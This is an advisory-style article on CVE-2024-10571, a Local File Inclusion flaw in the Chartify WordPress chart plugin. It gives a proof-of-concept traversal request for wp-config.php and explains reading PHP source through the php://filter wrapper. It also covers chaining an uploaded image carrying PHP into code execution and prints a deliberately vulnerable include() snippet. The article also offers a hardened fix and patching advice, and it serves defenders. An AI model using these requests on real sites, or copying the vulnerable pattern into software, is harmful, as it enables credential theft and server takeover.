CVE-2024-10571 identifies a serious Local File Inclusion (LFI) vulnerability in the Chartify – WordPress Chart Plugin, affecting all versions up to and including 2.9.5. The flaw allows remote, unauthenticated attackers to make the plugin include arbitrary files from the server's filesystem by way of the source parameter in plugin requests. Because included files are processed by PHP, the impact ranges from disclosure of sensitive files and credentials to, where the attacker can get PHP code into a file on the server, remote code execution.
In this article, we break down how the exploit works, show proof-of-concept (PoC) requests and code, analyze the real-world risk, and provide references for further reading.
Vulnerable Component
Plugin: Chartify – WordPress Chart Plugin
Affected versions: ≤ 2.9.5
Vulnerable parameter: source
Vulnerability type: Local File Inclusion (LFI)
How the Vulnerability Works
The source parameter is not sanitized, so a value taken straight from the web request decides which file PHP loads and includes. An attacker can point it at sensitive files elsewhere on the server (using ../ traversal) or at files they have placed there themselves. If the site accepts file uploads from the attacker, for example through a contact-form or gallery plugin or an account with media-upload rights, the attacker can upload a file that looks like an image but contains PHP code, then include it through this LFI to get it executed.
Here is a simple example of triggering the vulnerability from a browser or with a tool like curl:
http://example.com/wp-content/plugins/chartify/includes/get_chart.php?source=../../../../../../wp-config.php
Explanation:
This request asks the plugin to include wp-config.php, the file that holds the WordPress database credentials and secret keys; exposing it is a major compromise. One caveat: PHP's include() runs a .php file rather than printing it, so a plain traversal path executes wp-config.php instead of displaying it. Reading the source of a PHP file through an include-based LFI is normally done with the php://filter stream wrapper (for example convert.base64-encode), which include() accepts even with allow_url_include=Off; non-PHP files such as /etc/passwd are simply echoed back.
Sample PHP Vulnerable Code (for illustration)

```php
<?php
// get_chart.php (simplified illustration of the bug, not the plugin's actual code)
// The request parameter goes straight into include(): any path on disk,
// and any stream wrapper PHP understands, will be loaded.
if (isset($_GET['source'])) {
    include($_GET['source']);
}
```

The above code naively trusts the user input: no allowlist, no restriction on directories or file types, and no check that the resolved path stays inside the plugin's own folder. That is the prime recipe for LFI. Note that with PHP's default allow_url_include=Off, remote http:// URLs cannot be pulled in this way, but every local file the web server can read, and the php:// wrappers, can.
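One way to fix this pattern, shown here as an added example and not the plugin's actual patch: reject anything that is not a plain short name, and then confirm that the path PHP will really open is still inside the directory the plugin owns. The directory layout (a sources/ folder holding one template per chart name) and the CLI self-test with constructed attacker inputs are assumptions made for the illustration.

```php
<?php
// get_chart.php (hardened) - added illustration, not the plugin's own code.
// Assumption: chart templates live as <name>.php inside one fixed directory.
declare(strict_types=1);

/**
 * Map an untrusted "source" value to a file inside $baseDir, or return null.
 *
 * Two independent layers:
 *   1. the value must be a short, plain name (no separators, no "..",
 *      no "scheme://" wrappers, no NUL bytes), and
 *   2. the path PHP will actually open must still be under $baseDir after
 *      symlink and ".." resolution (realpath), as defence in depth.
 */
function resolve_chart_source(string $source, string $baseDir): ?string
{
    // Layer 1: strict character allowlist and a length cap.
    if ($source === '' || strlen($source) > 64
        || preg_match('/\A[A-Za-z0-9_-]+\z/', $source) !== 1) {
        return null;
    }

    // Layer 2: canonicalise both sides and check containment.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $source . '.php');
    if ($base === false || $path === false) {
        return null;                       // base dir missing or file absent
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // resolved outside the base dir
    }
    return $path;
}

if (PHP_SAPI !== 'cli') {
    // Web entry point: same shape as the vulnerable handler, but guarded.
    $source = isset($_GET['source']) ? (string) $_GET['source'] : '';
    $path   = resolve_chart_source($source, __DIR__ . '/sources');
    if ($path === null) {
        http_response_code(400);
        exit('invalid chart source');
    }
    include $path;
    exit;
}

// CLI self-test with constructed attacker inputs (not real traffic).
$demoDir = sys_get_temp_dir() . '/chartify_hardening_demo';
if (!is_dir($demoDir)) {
    mkdir($demoDir, 0700, true);
}
file_put_contents($demoDir . '/pie.php', "<?php echo 'pie';\n");

$probes = [
    'pie',                                                           // legitimate
    '../../../../wp-config.php',                                     // traversal
    'php://filter/convert.base64-encode/resource=../wp-config.php',  // wrapper
    "pie\0.jpg",                                                     // NUL byte
    '/etc/passwd',                                                   // absolute path
    'missing',                                                       // not on disk
];
foreach ($probes as $probe) {
    $result = resolve_chart_source($probe, $demoDir);
    printf("%-62s => %s\n", addcslashes($probe, "\0"), $result ?? 'rejected');
}
```

Run it with `php get_chart.php` to see only the legitimate name resolve to a path under the demo directory; every other probe is rejected by the first layer before realpath() is even consulted. The second layer is there for the day someone relaxes the regex or adds a user-controlled subdirectory.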
File Upload + LFI
If the site lets the attacker get a file onto disk, whether through an unauthenticated upload feature in another plugin or through a low-privilege account with media-upload rights, the LFI turns into code execution. The uploaded file does not need a .php extension: include() executes whatever PHP tags it finds inside the file, so an image that passes an extension or MIME-type check but carries embedded PHP code is enough. The attacker then points source at the uploaded file's path (for example somewhere under wp-content/uploads) and the server runs it.
Leaking sensitive files:
Files such as /etc/passwd, wp-config.php, and any other server-side file the web server account can read can be disclosed (non-PHP files verbatim, PHP files through the php://filter wrapper). Database credentials and WordPress salts recovered this way typically give the attacker the whole site.
Update Immediately:
Upgrade Chartify to the latest patched version (anything newer than 2.9.5). If you cannot update right away, deactivate the plugin until you can; a WAF rule that blocks traversal sequences and php:// wrappers in the source parameter reduces exposure but is not a substitute for the fix. Afterwards, review your web server access logs for requests to the plugin that carry ../ or php:// in source, and treat any hit as a possible compromise that warrants rotating the secrets in wp-config.php.
References
- Official WordPress Plugin Page
- CVE-2024-10571 NVD Entry
- Wordfence Advisory on Chartify LFI
- General Guide: Understanding Local File Inclusion (LFI)
Conclusion
CVE-2024-10571 is a dangerous, easy-to-exploit issue in Chartify for WordPress. Anyone running a vulnerable version should patch immediately: the exploit is a single crafted request with no login required, and the advisory details are public. More generally, never pass request input to include() or similar file APIs; resolve file names against a fixed allowlist or a sealed directory, and run the web application with the least privilege it needs so that a file-read bug cannot reach credentials or system files.
Stay secure! If you have questions or need help, contact your hosting provider or a security professional.
Timeline
Published on: 11/14/2024 11:15:04 UTC
Last modified on: 11/19/2024 15:46:52 UTC